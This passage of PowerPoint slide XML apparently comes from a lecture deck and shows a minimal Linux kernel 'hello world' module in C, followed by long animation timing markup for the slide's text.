          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>hello.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>module.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;	/* Needed by all modules */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>kernel.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;	/* Needed for KERN_INFO */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Needed for the macros </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>MODULE_LICENSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>("GPL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>");		/* Prevent “tainting” the kernel */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>MODULE_AUTHOR(”Your Name Here");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init_hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(void)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>? Ha! There’s no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> in the kernel */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(KERN_INFO "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Hello world!\n"); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>static void __exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cleanup_hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(void) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>printk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(KERN_INFO "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Goodbye world!\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>module_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>init_hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>module_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cleanup_hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188852073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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="with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animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">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5">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="28" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
